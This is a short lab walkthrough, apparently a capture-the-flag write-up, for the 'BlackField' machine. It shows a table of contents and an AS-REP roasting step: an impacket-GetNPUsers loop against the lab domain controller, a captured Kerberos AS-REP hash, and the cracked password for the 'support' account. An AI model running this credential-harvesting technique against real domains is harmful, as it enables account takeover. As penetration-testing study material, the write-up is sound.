BlackField
05-Nmap
10-Recon
15-AS-REP Roast
20-LDAP
25 - Kerberosting
30 - bloodhound-python
35-ChangingPasswordForAudit2020
40-InterestingFilesInSMBshare
45-Enumeration
50-Getting ntds.dit
55-Getting Root.txt
15-AS-REP Roast

with impacket-GetNpuser i can test each user if the user have the UF_DONT_REQUIRE_PREAUTH flag set to true, I can get a hash that i can crack.

for user in $(cat users); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.192 blackfield.local/$user | grep krb5as; done 
$krb5asrep$23$support@BLACKFIELD.LOCAL:aaada430536502fa18fe3d0c1140198e$21c25d7f31de8fce15cda469de8a93472856a0e8f1f4868fe1a465e00064f651d9aaf2a377869f13fc8824a2d4d7a00265f951d2e988bf1eadb5d71925b46e0e6bea680a28a28091fcb6c6d8278613f4a3e5c86ebe30529dc96b565ce5df36f76c3eba419eddd2ed5a6a80bc15a4ca9bbaaeff776bf749a7a92c89c1b52625b07b0a3eb7d815f0b64f36e80dce2d3a3e21521b84db7cf47da068451b78ff4ce9315d0f7d3ef68975e210009e1350c50b0ebc072080d85c3baca5eeccc73b49edafa083ba995b51c578affae6db349b1c6e645693fa3ce679000cd2ab1e6cc7da9615cb67c527705b8ad8e1bba2072d8b8d76be2b

Pasted image 20240111231733.png

support@BLACKFIELD.LOCAL:#00^BlackKnight

with this credential i was not able to get a shell with winrm and also with smb I only had read access to NETLOGON and SYSVOL shares which were empty.

Table Of Contents